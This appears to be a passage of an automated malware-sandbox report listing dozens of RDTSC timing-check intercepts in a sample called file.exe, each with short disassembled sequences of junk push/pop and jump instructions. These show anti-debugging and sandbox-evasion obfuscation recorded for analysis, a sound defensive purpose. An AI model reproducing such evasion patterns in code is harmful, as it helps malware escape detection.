                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125522D second address: 1255233 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125B6CD second address: 125B6D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125BC31 second address: 125BC3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 ja 00007EFEB91CA546h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125BC3F second address: 125BC45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125BC45 second address: 125BC49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125BDD8 second address: 125BDF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007EFEB92DE1F1h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125BDF1 second address: 125BE05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007EFEB91CA54Ch 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125C359 second address: 125C366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007EFEB92DE1E6h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125C4F8 second address: 125C509 instructions: 0x00000000 rdtsc 0x00000002 jne 00007EFEB91CA546h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125C509 second address: 125C50E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125C50E second address: 125C514 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125C514 second address: 125C51A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125C7CC second address: 125C7D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125F68F second address: 125F6AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB92DE1F5h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12655DC second address: 12655E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1263F99 second address: 1263FA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFEB92DE1EBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1263FA8 second address: 1263FCA instructions: 0x00000000 rdtsc 0x00000002 jg 00007EFEB91CA546h 0x00000008 jmp 00007EFEB91CA558h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1263FCA second address: 1263FD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1264174 second address: 1264197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007EFEB91CA557h 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1264197 second address: 12641A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12641A2 second address: 12641A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1264307 second address: 1264337 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 jno 00007EFEB92DE1E6h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push edi 0x00000012 jp 00007EFEB92DE1E6h 0x00000018 push edx 0x00000019 pop edx 0x0000001a pop edi 0x0000001b jmp 00007EFEB92DE1EDh 0x00000020 push eax 0x00000021 push edx 0x00000022 jns 00007EFEB92DE1E6h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1264337 second address: 126433B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126433B second address: 126435E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007EFEB92DE1F2h 0x0000000e je 00007EFEB92DE1E6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1264753 second address: 126475E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007EFEB91CA546h 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1264A4E second address: 1264A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFEB92DE1F0h 0x00000009 jmp 00007EFEB92DE1F7h 0x0000000e js 00007EFEB92DE1E6h 0x00000014 popad 0x00000015 pushad 0x00000016 jl 00007EFEB92DE1E6h 0x0000001c push edi 0x0000001d pop edi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1264FD4 second address: 1264FDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1264FDA second address: 1264FE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1264FE0 second address: 1264FE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1265453 second address: 1265463 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007EFEB92DE1E6h 0x00000008 jl 00007EFEB92DE1E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1265463 second address: 1265472 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jnl 00007EFEB91CA546h 0x0000000b pop edx 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1268F0C second address: 1268F10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1268F10 second address: 1268F14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1268F14 second address: 1268F26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007EFEB92DE1EAh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1268F26 second address: 1268F34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFEB91CA54Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1268F34 second address: 1268F71 instructions: 0x00000000 rdtsc 0x00000002 js 00007EFEB92DE1E6h 0x00000008 jmp 00007EFEB92DE1F1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edx 0x00000012 je 00007EFEB92DE1E8h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a pushad 0x0000001b jmp 00007EFEB92DE1F4h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122A4DE second address: 122A4E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122A4E2 second address: 120FFF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 jne 00007EFEB92DE1ECh 0x0000000e call dword ptr [ebp+122D1AA0h] 0x00000014 pushad 0x00000015 pushad 0x00000016 jns 00007EFEB92DE1E6h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122A59F second address: 122A5A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122A5A3 second address: 122A5A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122A9C6 second address: 122A9D8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007EFEB91CA546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007EFEB91CA546h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122AB9B second address: 122ABB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB92DE1F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122ABB9 second address: 122ABED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFEB91CA54Ah 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edi 0x0000000d push edi 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop edi 0x00000011 pop edi 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007EFEB91CA557h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122ABED second address: 122ABF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122ADD3 second address: 122ADD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122ADD7 second address: 122ADE8 instructions: 0x00000000 rdtsc 0x00000002 js 00007EFEB92DE1E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122ADE8 second address: 122ADEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122ADEC second address: 122ADFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122B068 second address: 122B07F instructions: 0x00000000 rdtsc 0x00000002 jc 00007EFEB91CA548h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d js 00007EFEB91CA55Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122B7F7 second address: 122B80C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB92DE1F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122B80C second address: 122B816 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007EFEB91CA54Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126CC80 second address: 126CC9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB92DE1F9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126CDE0 second address: 126CE09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007EFEB91CA550h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007EFEB91CA548h 0x00000014 push eax 0x00000015 push edx 0x00000016 ja 00007EFEB91CA546h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126CE09 second address: 126CE13 instructions: 0x00000000 rdtsc 0x00000002 je 00007EFEB92DE1E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126D397 second address: 126D3A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007EFEB91CA54Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1274326 second address: 127432C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127432C second address: 1274332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1274332 second address: 1274338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1274338 second address: 1274347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007EFEB91CA54Ah 0x0000000b push eax 0x0000000c pop eax 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1274347 second address: 1274376 instructions: 0x00000000 rdtsc 0x00000002 jg 00007EFEB92DE1EEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007EFEB92DE1F7h 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1274376 second address: 12743A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007EFEB91CA550h 0x0000000b popad 0x0000000c jg 00007EFEB91CA559h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1273123 second address: 127313E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 jmp 00007EFEB92DE1F2h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127313E second address: 1273152 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007EFEB91CA546h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007EFEB91CA546h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1273152 second address: 1273156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127327B second address: 1273281 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1273281 second address: 1273290 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007EFEB92DE1E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12737E7 second address: 1273815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 pushad 0x00000007 push edi 0x00000008 jmp 00007EFEB91CA550h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 jmp 00007EFEB91CA54Fh 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1273815 second address: 127382E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFEB92DE1F5h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127382E second address: 127383C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB91CA54Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1272E8C second address: 1272E90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1279917 second address: 127991B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1279220 second address: 1279224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1279224 second address: 127922E instructions: 0x00000000 rdtsc 0x00000002 jg 00007EFEB91CA546h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127922E second address: 1279234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1279234 second address: 1279239 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127C029 second address: 127C02F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127C02F second address: 127C038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127C038 second address: 127C060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFEB92DE1F9h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c jl 00007EFEB92DE1EEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E66B2 second address: 11E66B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12810A0 second address: 12810A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1280573 second address: 1280579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12864B5 second address: 12864BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12864BB second address: 12864C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12864C1 second address: 12864C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12864C6 second address: 12864E4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007EFEB91CA559h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12864E4 second address: 1286516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007EFEB92DE1EDh 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007EFEB92DE1F5h 0x00000012 push eax 0x00000013 push edx 0x00000014 ja 00007EFEB92DE1E6h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1286516 second address: 128651A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128651A second address: 1286539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFEB92DE1F1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007EFEB92DE1E6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1286539 second address: 1286556 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB91CA54Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007EFEB91CA54Eh 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128668B second address: 128668F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128668F second address: 128669C instructions: 0x00000000 rdtsc 0x00000002 jg 00007EFEB91CA546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128669C second address: 12866A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007EFEB92DE1E6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12866A9 second address: 12866B8 instructions: 0x00000000 rdtsc 0x00000002 ja 00007EFEB91CA546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1286B26 second address: 1286B2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1286B2A second address: 1286B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jc 00007EFEB91CA546h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1286CC0 second address: 1286CC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1286CC5 second address: 1286CD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB91CA54Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1286CD9 second address: 1286CEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFEB92DE1EFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122B2D3 second address: 122B2D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122B2D7 second address: 122B2E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
